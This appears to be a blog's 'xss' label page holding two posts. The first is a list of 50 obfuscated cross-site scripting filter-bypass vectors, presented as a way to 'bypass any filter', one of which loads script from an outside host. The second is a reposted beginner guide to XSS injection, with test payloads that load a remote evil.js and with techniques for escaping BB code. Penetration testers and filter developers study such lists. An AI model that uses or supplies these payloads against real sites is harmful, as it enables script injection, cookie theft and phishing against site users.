Showing posts with label xss. Show all posts
Showing posts with label xss. Show all posts

Monday 19 November 2012

50 Awesome XSS Vectors From @soaj1664ashar

Here are 50 awesome XSS vectors that @soaj1664ashar has been tweeting over time. Can be quite useful for bypassing any filter with the help of these full baked vectors.

50 awesome XSS vectors that I have tweeted (@soaj1664ashar) over time. Enjoy! Now you can bypass any filter with the help of these full baked vectors :-)

1) <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
 
2) <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
 
3) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
 
4) <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
 
5) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
 
6) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
 
7) <var onmouseover="prompt(1)">On Mouse Over</var>
 
8) <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
 
9) <img src="/" =_=" title="onerror='prompt(1)'">
 
10) <%<!--'%><script>alert(1);</script -->
 
11) <script src="data:text/javascript,alert(1)"></script>
 
12) <iframe/src \/\/onload = prompt(1)
 
13) <iframe/onreadystatechange=alert(1)
 
14) <svg/onload=alert(1)
 
15) <input value=<><iframe/src=javascript:confirm(1)
 
16) <input type="text" value=``<div/onmouseover='alert(1)'>X</div>
 
17) http://www.<script>alert(1)</script .com
 
 
18) <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
 
19) <svg><script ?>alert(1)
 
20) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
 
21) <img src=`xx:xx`onerror=alert(1)>
 
22) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
 
23) <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
 
24) <math><a xlink:href="//jsfiddle.net/t846h/">click
 
25) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
 
26) <svg contentScriptType=text/vbs><script>MsgBox+1
 
27) <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
 
28) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
 
29) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
 
30) <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
 
31) <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
 
32) <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
 
33) <script>+-+-1-+-+alert(1)</script>
 
34) <body/onload=&lt;!--&gt;&#10alert(1)>
 
35) <script itworksinallbrowsers>/*<script* */alert(1)</script
 
36) <img src ?itworksonchrome?\/onerror = alert(1)
 
37) <svg><script>//&NewLine;confirm(1);</script </svg>
 
38) <svg><script onlypossibleinopera:-)> alert(1)
 
39) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
 
40) <script x> alert(1) </script 1=2
 
41) <div/onmouseover='alert(1)'> style="x:">
 
42)  <--`<img/src=` onerror=alert(1)> --!>
 
43) <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
 
44) <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
 
45) "><img src=x onerror=window.open('https://www.google.com/');>
 
46) <form><button formaction=javascript&colon;alert(1)>CLICKME
 
47) <math><a xlink:href="//jsfiddle.net/t846h/">click
 
48) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
 
49) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
 
50) <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>


Or Grab from pastebin :)


Read more...

Tuesday 13 December 2011

Art of hacking 3 - spyd3rm4n's guide to hacking

This series of articles can be very useful for many beginners out there but after the thedefaced and darkmindz went down, I haven't really seen these articles anywhere else. So I thought to share this article over here. Its NOT written by me and I would like to provide the full credit to the original author as well.

Previous articles:
Part 1

Part 2


spyd3rm4n's guide to XSS Injection

Part 3

[0x01] XSS_Definition
[0x02] Pen-Testing
[0x03] Common Fields
[0x04] Escaping_BB_Code
[0x05] Image_XSS


Sub XSS_Defnition{

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Recently, vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits. Cross-site scripting was originally referred to as CSS, although this usage has been largely discontinued.

-Taken from Wikipedia Wikipedia if you want to read more.
}

Sub Pen-Testing{

Pen-Testing, short for Penetration Testing. Pen-testing with XSS can be very easy, or very hard. It depends on the person doing this. Some common queries when pen-testing a field can include but are not limited to:

<script>alert(1)</script>
<script language="javascript">alert(1)</script>
<script src="http://site.com/evil.js">
<img src="http://site.com/evil.js">


A great site to find some of the most useful queries it http://ha.ckers.org/xss.html

Now, once you've tested the fields, if the following page returned contains any sort of popup/javascript. You know it's vulnerable.

}

Sub Common_Fields{

Some of the most common fields that I have noticed are search fields. These will most likely return the following page showing the input.

Example: I search for "Orson Wells" and the page returned: 0 Results for query "Orson Wells" or something of that sort.

There are simple ways to get around this, since I am a php coder, my favorite way is the htmlentities(), you can also use strip_tags().

Some other search engines might not show what you searched for on the page itself, but in the field, the value is still there.

If this is the case, you can search for '"/></>[XSS]

this should escape the html field value, if it is not sanitized correctly and execute the [XSS] on the page.

Basically, any field that asks for user input that is either POST or GET and is in the source of the following page, can be cross-site scripted if not properly sanitized.

}

Sub Escaping_BB_Code{

This is one of my favorite ways to XSS a site. Some people decide to create their own BB code or use on that is poorly sanitized. This can be very easy to exploit.

Let's say there is an option to make my font red using hte [font color="red"] BB code.

Well, if I post a message with [font color="red"]hi[/font] and I look at the next page's source code, I see <font color="red">hi</font>,

I will re-post using

[font color="red"></font><script>alert(/hi/)</script>]hi[/font]

And if it is poorly sanitized, the page following it would contain an alert box saying /hi/.



There are so many different ways to escape BB code it is almost too easy. Some other sites have [IMG]. This one can be easy also.

[IMG]http://site.com/image"></><script src=http://site.com/evil.js>[/IMG]

would have

<img src="http://site.com/image"></><script src=http://site.com/evil.js>

}

Sub Image_XSS{

This is probably the best discovery to XSS since, whenever. With this, you can place javascript inside an image and have it execute in Internet Explorer.

Reffer to: http://milw0rm.com/video/watch.php?id=58

}


Read more...